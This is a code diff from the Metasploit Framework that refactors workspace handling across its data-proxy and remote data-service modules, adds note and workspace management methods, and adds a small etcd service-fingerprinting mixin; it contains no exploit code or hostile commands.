self.log_error(e, "Problem generating DB Export")
|
||||
end
|
||||
end
|
||||
|
||||
def import_file(opts, &block)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.import_file(opts, &block)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem generating DB Export")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -2,7 +2,8 @@ module EventDataProxy
|
|||
|
||||
def report_event(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_event(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting event")
|
||||
|
|
|
@ -2,7 +2,7 @@ module ExploitDataProxy
|
|||
|
||||
def report_exploit_attempt(host, opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.report_exploit_attempt(host, opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting exploit attempt")
|
||||
|
@ -11,7 +11,8 @@ module ExploitDataProxy
|
|||
|
||||
def report_exploit_failure(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_exploit_failure(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting exploit failure")
|
||||
|
@ -20,7 +21,8 @@ module ExploitDataProxy
|
|||
|
||||
def report_exploit_success(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_exploit_success(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting exploit success")
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
module HostDataProxy
|
||||
|
||||
def hosts(wspace = workspace, non_dead = false, addresses = nil, search_term = nil)
|
||||
def hosts(wspace = workspace.name, non_dead = false, addresses = nil, search_term = nil)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
opts = {}
|
||||
opts[:wspace] = wspace
|
||||
add_opts_workspace(opts, wspace)
|
||||
opts[:non_dead] = non_dead
|
||||
opts[:address] = addresses
|
||||
opts[:search_term] = search_term
|
||||
|
@ -34,7 +34,8 @@ module HostDataProxy
|
|||
return unless valid(opts)
|
||||
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_host(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting host")
|
||||
|
@ -43,7 +44,8 @@ module HostDataProxy
|
|||
|
||||
def report_hosts(hosts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(hosts)
|
||||
data_service.report_hosts(hosts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting hosts")
|
||||
|
@ -52,7 +54,7 @@ module HostDataProxy
|
|||
|
||||
def update_host(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.update_host(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem updating host")
|
||||
|
@ -61,7 +63,7 @@ module HostDataProxy
|
|||
|
||||
def delete_host(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_host(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem deleting host")
|
||||
|
|
|
@ -2,10 +2,11 @@ module LootDataProxy
|
|||
|
||||
def report_loot(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
if !data_service.is_a?(Msf::DBManager)
|
||||
opts[:data] = Base64.urlsafe_encode64(opts[:data]) if opts[:data]
|
||||
end
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_loot(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting loot")
|
||||
|
@ -21,7 +22,7 @@ module LootDataProxy
|
|||
def loots(wspace, opts = {})
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
opts[:wspace] = wspace
|
||||
add_opts_workspace(opts, wspace)
|
||||
data_service.loot(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving loot")
|
||||
|
|
|
@ -2,7 +2,8 @@ module NmapDataProxy
|
|||
|
||||
def import_nmap_xml_file(args = {})
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(args)
|
||||
data_service.import_nmap_xml_file(args)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem importing Nmap XML file")
|
||||
|
|
|
@ -1,10 +1,45 @@
|
|||
module NoteDataProxy
|
||||
|
||||
def notes(opts)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.notes(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving notes")
|
||||
end
|
||||
end
|
||||
|
||||
# TODO: like other *DataProxy modules this currently skips the "find" part
|
||||
def find_or_create_note(opts)
|
||||
report_note(opts)
|
||||
end
|
||||
|
||||
def report_note(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_note(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting note")
|
||||
end
|
||||
end
|
||||
|
||||
def update_note(opts)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_note(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem updating note")
|
||||
end
|
||||
end
|
||||
|
||||
def delete_note(opts)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_note(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem deleting note")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,9 +1,9 @@
|
|||
module ServiceDataProxy
|
||||
|
||||
def services(wspace = workspace, opts = {})
|
||||
def services(wspace = workspace.name, opts = {})
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
opts[:workspace] = wspace
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts, wspace)
|
||||
data_service.services(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, 'Problem retrieving services')
|
||||
|
@ -16,7 +16,8 @@ module ServiceDataProxy
|
|||
|
||||
def report_service(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_service(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, 'Problem reporting service')
|
||||
|
@ -25,7 +26,7 @@ module ServiceDataProxy
|
|||
|
||||
def update_service(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.update_service(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, 'Problem updating service')
|
||||
|
@ -34,7 +35,7 @@ module ServiceDataProxy
|
|||
|
||||
def delete_service(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_service(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, 'Problem deleting service')
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
module SessionDataProxy
|
||||
def report_session(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.report_session(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting session")
|
||||
|
|
|
@ -2,7 +2,7 @@ module VulnAttemptDataProxy
|
|||
|
||||
def vuln_attempts(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.vuln_attempts(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving vulnerability attempts")
|
||||
|
@ -11,7 +11,8 @@ module VulnAttemptDataProxy
|
|||
|
||||
def report_vuln_attempt(vuln, opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_vuln_attempt(vuln, opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting vulnerability attempts")
|
||||
|
|
|
@ -3,7 +3,8 @@ module VulnDataProxy
|
|||
|
||||
def vulns(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.vulns(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving vulns")
|
||||
|
@ -12,7 +13,8 @@ module VulnDataProxy
|
|||
|
||||
def report_vuln(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_vuln(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem reporting vuln")
|
||||
|
@ -21,7 +23,7 @@ module VulnDataProxy
|
|||
|
||||
def update_vuln(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.update_vuln(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem updating vuln")
|
||||
|
@ -30,7 +32,7 @@ module VulnDataProxy
|
|||
|
||||
def delete_vuln(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_vuln(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem deleting vuln")
|
||||
|
|
|
@ -2,8 +2,9 @@ module WorkspaceDataProxy
|
|||
|
||||
def find_workspace(workspace_name)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.find_workspace(workspace_name)
|
||||
data_service = self.get_data_service
|
||||
opts = { name: workspace_name }
|
||||
data_service.workspaces(opts).first
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem finding workspace")
|
||||
end
|
||||
|
@ -11,8 +12,9 @@ module WorkspaceDataProxy
|
|||
|
||||
def add_workspace(workspace_name)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.add_workspace(workspace_name)
|
||||
data_service = self.get_data_service
|
||||
opts = { name: workspace_name }
|
||||
data_service.add_workspace(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem adding workspace")
|
||||
end
|
||||
|
@ -20,8 +22,11 @@ module WorkspaceDataProxy
|
|||
|
||||
def default_workspace
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.default_workspace
|
||||
ws = find_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
|
||||
if ws.nil?
|
||||
ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
|
||||
end
|
||||
ws
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem finding default workspace")
|
||||
end
|
||||
|
@ -29,38 +34,52 @@ module WorkspaceDataProxy
|
|||
|
||||
def workspace
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.workspace
|
||||
if @current_workspace
|
||||
@current_workspace
|
||||
else
|
||||
# This is mostly a failsafe to prevent bad things from happening. @current_workspace should always be set
|
||||
# outside of here, but this will save us from crashes/infinite loops if that happens
|
||||
warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
|
||||
@current_workspace = default_workspace
|
||||
end
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving workspace")
|
||||
end
|
||||
end
|
||||
|
||||
# TODO: Tracking of the current workspace should be moved out of the datastore. See MS-3095.
|
||||
def workspace=(workspace)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.workspace = workspace
|
||||
@current_workspace = workspace
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem setting workspace")
|
||||
end
|
||||
end
|
||||
|
||||
def workspaces
|
||||
def workspaces(opts = {})
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.workspaces
|
||||
data_service = self.get_data_service
|
||||
data_service.workspaces(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving workspaces")
|
||||
end
|
||||
end
|
||||
|
||||
def workspace_associations_counts()
|
||||
def delete_workspaces(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.workspace_associations_counts()
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving workspace counts")
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_workspaces(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem deleting workspaces")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
def update_workspace(opts)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_workspace(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem updating workspace")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -131,11 +131,11 @@ class RemoteHTTPDataService
|
|||
def make_request(request_type, path, data_hash = nil, query = nil)
|
||||
begin
|
||||
# simplify query by removing nil values
|
||||
query_str = (!query.nil? && !query.empty?) ? append_workspace(query).compact.to_query : nil
|
||||
query_str = (!query.nil? && !query.empty?) ? query.compact.to_query : nil
|
||||
uri = URI::HTTP::build({path: path, query: query_str})
|
||||
dlog("HTTP #{request_type} request to #{uri.request_uri} with #{data_hash ? data_hash : "nil"}")
|
||||
|
||||
client = @client_pool.pop()
|
||||
client = @client_pool.pop
|
||||
case request_type
|
||||
when GET_REQUEST
|
||||
request = Net::HTTP::Get.new(uri.request_uri)
|
||||
|
@ -180,6 +180,10 @@ class RemoteHTTPDataService
|
|||
"remote_data_service: (#{@endpoint})"
|
||||
end
|
||||
|
||||
def is_local?
|
||||
false
|
||||
end
|
||||
|
||||
def set_header(key, value)
|
||||
@headers = Hash.new() if @headers.nil?
|
||||
|
||||
|
@ -229,19 +233,6 @@ class RemoteHTTPDataService
|
|||
raise 'Endpoint cannot be nil' if endpoint.nil?
|
||||
end
|
||||
|
||||
def append_workspace(data_hash)
|
||||
workspace = data_hash[:workspace]
|
||||
workspace = data_hash.delete(:wspace) unless workspace
|
||||
|
||||
if workspace && (workspace.is_a?(OpenStruct) || workspace.is_a?(::Mdm::Workspace))
|
||||
data_hash[:workspace] = workspace.name
|
||||
end
|
||||
|
||||
data_hash[:workspace] = current_workspace_name if workspace.nil?
|
||||
|
||||
data_hash
|
||||
end
|
||||
|
||||
def build_request(request, data_hash)
|
||||
request.content_type = 'application/json'
|
||||
if !data_hash.nil? && !data_hash.empty?
|
||||
|
@ -254,7 +245,7 @@ class RemoteHTTPDataService
|
|||
data_hash.delete(k)
|
||||
end
|
||||
end
|
||||
json_body = append_workspace(data_hash).to_json
|
||||
json_body = data_hash.to_json
|
||||
request.body = json_body
|
||||
end
|
||||
|
||||
|
|
|
@ -4,8 +4,26 @@ module RemoteNoteDataService
|
|||
include ResponseDataHelper
|
||||
|
||||
NOTE_API_PATH = '/api/v1/notes'
|
||||
NOTE_MDM_CLASS = 'Mdm::Note'
|
||||
|
||||
def notes(opts)
|
||||
json_to_mdm_object(self.get_data(NOTE_API_PATH, nil, opts), NOTE_MDM_CLASS, [])
|
||||
end
|
||||
|
||||
def report_note(opts)
|
||||
self.post_data_async(NOTE_API_PATH, opts)
|
||||
json_to_mdm_object(self.post_data(NOTE_API_PATH, opts), NOTE_MDM_CLASS, []).first
|
||||
end
|
||||
|
||||
def update_note(opts)
|
||||
path = NOTE_API_PATH
|
||||
if opts && opts[:id]
|
||||
id = opts.delete(:id)
|
||||
path = "#{NOTE_API_PATH}/#{id}"
|
||||
end
|
||||
json_to_mdm_object(self.put_data(path, opts), NOTE_MDM_CLASS, [])
|
||||
end
|
||||
|
||||
def delete_note(opts)
|
||||
json_to_mdm_object(self.delete_data(NOTE_API_PATH, opts), NOTE_MDM_CLASS, [])
|
||||
end
|
||||
end
|
|
@ -3,55 +3,47 @@ require 'metasploit/framework/data_service/remote/http/response_data_helper'
|
|||
module RemoteWorkspaceDataService
|
||||
include ResponseDataHelper
|
||||
|
||||
# TODO: should counts be a flag in query data for the workspaces resource?
|
||||
WORKSPACE_COUNTS_API_PATH = '/api/v1/workspaces/counts'
|
||||
WORKSPACE_API_PATH = '/api/v1/workspaces'
|
||||
WORKSPACE_MDM_CLASS = 'Mdm::Workspace'
|
||||
DEFAULT_WORKSPACE_NAME = 'default'
|
||||
|
||||
def find_workspace(workspace_name)
|
||||
workspace = workspace_cache[workspace_name]
|
||||
return workspace unless (workspace.nil?)
|
||||
|
||||
workspace = json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, {:workspace_name => workspace_name}), WORKSPACE_MDM_CLASS).first
|
||||
workspace_cache[workspace_name] = workspace
|
||||
end
|
||||
|
||||
def add_workspace(workspace_name)
|
||||
response = self.post_data(WORKSPACE_API_PATH, {:workspace_name => workspace_name})
|
||||
json_to_mdm_object(response, WORKSPACE_MDM_CLASS, nil)
|
||||
def add_workspace(opts)
|
||||
response = self.post_data(WORKSPACE_API_PATH, opts)
|
||||
json_to_mdm_object(response, WORKSPACE_MDM_CLASS, nil).first
|
||||
end
|
||||
|
||||
def default_workspace
|
||||
find_workspace(DEFAULT_WORKSPACE_NAME)
|
||||
json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, nil, { name: Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME }), WORKSPACE_MDM_CLASS, [])
|
||||
end
|
||||
|
||||
def workspace
|
||||
find_workspace(current_workspace_name)
|
||||
# The @current_workspace is tracked on the client side, so attempting to call it directly from the RemoteDataService
|
||||
# will not return the correct results. Run it back through the proxy.
|
||||
wlog "[DEPRECATION] Calling workspace from within the RemoteDataService is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||
caller.each { |line| wlog "#{line}"}
|
||||
end
|
||||
|
||||
def workspace=(workspace)
|
||||
@current_workspace_name = workspace.name
|
||||
# The @current_workspace is tracked on the client side, so attempting to call it directly from the RemoteDataService
|
||||
# will not return the correct results. Run it back through the proxy.
|
||||
wlog "[DEPRECATION] Setting the current workspace from the RemoteDataService is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||
caller.each { |line| wlog "#{line}"}
|
||||
end
|
||||
|
||||
def workspaces
|
||||
json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, {:all => true}), WORKSPACE_MDM_CLASS, [])
|
||||
def workspaces(opts)
|
||||
json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, nil, opts), WORKSPACE_MDM_CLASS, [])
|
||||
end
|
||||
|
||||
def workspace_associations_counts()
|
||||
json_to_mdm_object(self.get_data(WORKSPACE_COUNTS_API_PATH, []), WORKSPACE_MDM_CLASS, [])
|
||||
def delete_workspaces(opts)
|
||||
json_to_mdm_object(self.delete_data(WORKSPACE_API_PATH, opts), WORKSPACE_MDM_CLASS, [])
|
||||
end
|
||||
|
||||
#########
|
||||
protected
|
||||
#########
|
||||
|
||||
def workspace_cache
|
||||
@workspace_cache ||= {}
|
||||
def update_workspace(opts)
|
||||
path = WORKSPACE_API_PATH
|
||||
if opts && opts[:id]
|
||||
id = opts.delete(:id)
|
||||
path = "#{WORKSPACE_API_PATH}/#{id}"
|
||||
end
|
||||
json_to_mdm_object(self.put_data(path, opts), WORKSPACE_MDM_CLASS, []).first
|
||||
end
|
||||
|
||||
def current_workspace_name
|
||||
@current_workspace_name ||= DEFAULT_WORKSPACE_NAME
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
module DbExportDataService
|
||||
def run_db_export(path, format)
|
||||
raise 'DbExportDataService#run_db_export is not implemented'
|
||||
end
|
||||
end
|
|
@ -0,0 +1,9 @@
|
|||
module DbImportDataService
|
||||
def import(opts, &block)
|
||||
raise 'DbImportDataService#import is not implemented'
|
||||
end
|
||||
|
||||
def import_file(opts, &block)
|
||||
raise 'DbImportDataService#import_file is not implemented'
|
||||
end
|
||||
end
|
|
@ -1,7 +1,19 @@
|
|||
module NoteDataService
|
||||
|
||||
def notes(opts)
|
||||
raise NotImplementedError, 'NoteDataService#notes is not implemented'
|
||||
end
|
||||
|
||||
def report_note(opts)
|
||||
raise 'NoteDataService#report_note is not implemented'
|
||||
raise NotImplementedError, 'NoteDataService#report_note is not implemented'
|
||||
end
|
||||
|
||||
def update_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#update_note is not implemented'
|
||||
end
|
||||
|
||||
def delete_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
|
||||
end
|
||||
|
||||
end
|
|
@ -27,9 +27,4 @@ module WorkspaceDataService
|
|||
def workspace_associations_counts()
|
||||
raise 'WorkspaceDataService#workspace_associations_counts is not implemented'
|
||||
end
|
||||
|
||||
def rename_workspace(from_name, to_name)
|
||||
raise 'WorkspaceDataService#rename_workspace is not implemented'
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -98,6 +98,11 @@ module Exploit
|
|||
# best encoder.
|
||||
exploit.datastore['ENCODER'] = opts['Encoder'] if opts['Encoder']
|
||||
|
||||
# Use the supplied NOP generator, if any. If one was not specified, then
|
||||
# nil will be assigned causing the exploit to default to picking a
|
||||
# compatible NOP generator.
|
||||
exploit.datastore['NOP'] = opts['Nop'] if opts['Nop']
|
||||
|
||||
# Force the payload to share the exploit's datastore
|
||||
driver.payload.share_datastore(driver.exploit.datastore)
|
||||
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core/exploit'
|
||||
|
||||
module Msf
|
||||
module Auxiliary::Etcd
|
||||
TCP_PORT = 2379
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(TCP_PORT),
|
||||
OptString.new('TARGETURI', [true, 'base URI of etcd', '/'])
|
||||
]
|
||||
)
|
||||
|
||||
register_autofilter_ports([TCP_PORT])
|
||||
end
|
||||
|
||||
def fingerprint_service(target_uri)
|
||||
res = send_request_raw(
|
||||
'uri' => normalize_uri(target_uri, 'version'),
|
||||
'method' => 'GET'
|
||||
)
|
||||
if res && res.code == 200
|
||||
begin
|
||||
banner = res.get_json_document
|
||||
rescue JSON::ParserError => e
|
||||
print_error("Failed to read JSON from etcd version response: #{e.class} - #{e.message}}")
|
||||
return
|
||||
end
|
||||
elsif res
|
||||
vprint_error("Invalid response #{res.code} for etcd version response")
|
||||
return
|
||||
else
|
||||
vprint_error("No response for etcd version probe")
|
||||
return
|
||||
end
|
||||
|
||||
report_service(
|
||||
host: rhost,
|
||||
port: rport,
|
||||
name: 'etcd',
|
||||
proto: 'tcp',
|
||||
info: banner
|
||||
)
|
||||
banner
|
||||
end
|
||||
end
|
||||
end
|
|
@ -39,3 +39,4 @@ require 'msf/core/auxiliary/mms'
|
|||
#
|
||||
require 'msf/core/auxiliary/cnpilot'
|
||||
require 'msf/core/auxiliary/epmp'
|
||||
require 'msf/core/auxiliary/etcd'
|
||||
|
|
|
@ -132,6 +132,8 @@ end
|
|||
MSF_LICENSE = "Metasploit Framework License (BSD)"
|
||||
GPL_LICENSE = "GNU Public License v2.0"
|
||||
BSD_LICENSE = "BSD License"
|
||||
# Location: https://github.com/CoreSecurity/impacket/blob/1dba4c20e0d47ec614521e251d072116f75f3ef8/LICENSE
|
||||
CORE_LICENSE = "CORE Security License (Apache 1.1)"
|
||||
ARTISTIC_LICENSE = "Perl Artistic License"
|
||||
UNKNOWN_LICENSE = "Unknown License"
|
||||
LICENSES =
|
||||
|
@ -139,6 +141,7 @@ LICENSES =
|
|||
MSF_LICENSE,
|
||||
GPL_LICENSE,
|
||||
BSD_LICENSE,
|
||||
CORE_LICENSE,
|
||||
ARTISTIC_LICENSE,
|
||||
UNKNOWN_LICENSE
|
||||
]
|
||||
|
|
|
@ -103,6 +103,10 @@ class Msf::DBManager
|
|||
'local_db_service'
|
||||
end
|
||||
|
||||
def is_local?
|
||||
true
|
||||
end
|
||||
|
||||
#
|
||||
# Attributes
|
||||
#
|
||||
|
@ -153,9 +157,6 @@ class Msf::DBManager
|
|||
#
|
||||
def initialize_database_support
|
||||
begin
|
||||
# Database drivers can reset our KCODE, do not let them
|
||||
$KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
|
||||
|
||||
add_rails_engine_migration_paths
|
||||
|
||||
@usable = true
|
||||
|
@ -190,8 +191,11 @@ class Msf::DBManager
|
|||
else
|
||||
configuration_pathname = Metasploit::Framework::Database.configurations_pathname(path: opts['DatabaseYAML'])
|
||||
|
||||
unless configuration_pathname.nil?
|
||||
if configuration_pathname.nil?
|
||||
self.error = "No database YAML file"
|
||||
else
|
||||
if configuration_pathname.readable?
|
||||
# parse specified database YAML file
|
||||
dbinfo = YAML.load_file(configuration_pathname) || {}
|
||||
dbenv = opts['DatabaseEnv'] || Rails.env
|
||||
db = dbinfo[dbenv]
|
||||
|
|
|
@ -16,9 +16,6 @@ module Msf::DBManager::Connection
|
|||
begin
|
||||
# Migrate the database, if needed
|
||||
migrate
|
||||
|
||||
# Set the default workspace
|
||||
self.workspace = self.default_workspace
|
||||
rescue ::Exception => exception
|
||||
self.error = exception
|
||||
elog("DB.connect threw an exception: #{exception}")
|
||||
|
@ -64,9 +61,6 @@ module Msf::DBManager::Connection
|
|||
return false
|
||||
ensure
|
||||
after_establish_connection
|
||||
|
||||
# Database drivers can reset our KCODE, do not let them
|
||||
$KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
|
||||
end
|
||||
|
||||
true
|
||||
|
@ -139,9 +133,6 @@ module Msf::DBManager::Connection
|
|||
rescue ::Exception => e
|
||||
self.error = e
|
||||
elog("DB.disconnect threw an exception: #{e}")
|
||||
ensure
|
||||
# Database drivers can reset our KCODE, do not let them
|
||||
$KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -2,8 +2,9 @@ module Msf::DBManager::Cred
|
|||
# This methods returns a list of all credentials in the database
|
||||
def creds(opts)
|
||||
query = nil
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace.id )
|
||||
query = Metasploit::Credential::Core.where( workspace_id: wspace.id )
|
||||
query = query.includes(:private, :public, :logins).references(:private, :public, :logins)
|
||||
query = query.includes(logins: [ :service, { service: :host } ])
|
||||
|
||||
|
@ -40,7 +41,7 @@ module Msf::DBManager::Cred
|
|||
|
||||
# This method iterates the creds table calling the supplied block with the
|
||||
# cred instance of each entry.
|
||||
def each_cred(wspace=workspace,&block)
|
||||
def each_cred(wspace=framework.db.workspace,&block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.creds.each do |cred|
|
||||
block.call(cred)
|
||||
|
@ -106,7 +107,7 @@ module Msf::DBManager::Cred
|
|||
# Nil is true for active.
|
||||
active = (opts[:active] || opts[:active].nil?) ? true : false
|
||||
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
# Service management; assume the user knows what
|
||||
# he's talking about.
|
||||
|
|
|
@ -2,7 +2,8 @@ require 'msf/core/db_export'
|
|||
|
||||
module Msf::DBManager::DbExport
|
||||
def run_db_export(opts)
|
||||
exporter = Msf::DBManager::Export.new(framework.db.workspace)
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
exporter = Msf::DBManager::Export.new(wspace)
|
||||
|
||||
output_file = exporter.send("to_#{opts[:format]}_file".intern, opts[:path]) do |mtype, mstatus, mname|
|
||||
if mtype == :status
|
||||
|
|
|
@ -8,7 +8,7 @@ module Msf::DBManager::Event
|
|||
def report_event(opts = {})
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = get_workspace(opts)
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
return if not wspace # Temp fix?
|
||||
uname = opts.delete(:username)
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ module Msf::DBManager::ExploitAttempt
|
|||
return unless opts.has_key?(:refs) && !opts[:refs].blank?
|
||||
host = opts[:host] || return
|
||||
|
||||
wspace = opts[:workspace] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
port = opts[:port]
|
||||
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
|
||||
svc = opts[:service]
|
||||
|
@ -73,7 +73,7 @@ module Msf::DBManager::ExploitAttempt
|
|||
return unless opts[:refs]
|
||||
host = opts[:host] || return
|
||||
|
||||
wspace = opts[:workspace] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
port = opts[:port]
|
||||
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
|
||||
svc = opts[:service]
|
||||
|
@ -222,7 +222,7 @@ module Msf::DBManager::ExploitAttempt
|
|||
# @option opts [String] :username
|
||||
# @return [ MetasploitDataModels::AutomaticExploitation::Match, MetasploitDataModels::AutomaticExploitation::Run]
|
||||
def create_match_for_vuln(vuln,opts)
|
||||
wspace = opts[:workspace] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
run = opts[:run]
|
||||
module_fullname = opts[:module]
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
module Msf::DBManager::ExploitedHost
|
||||
def each_exploited_host(wspace=workspace,&block)
|
||||
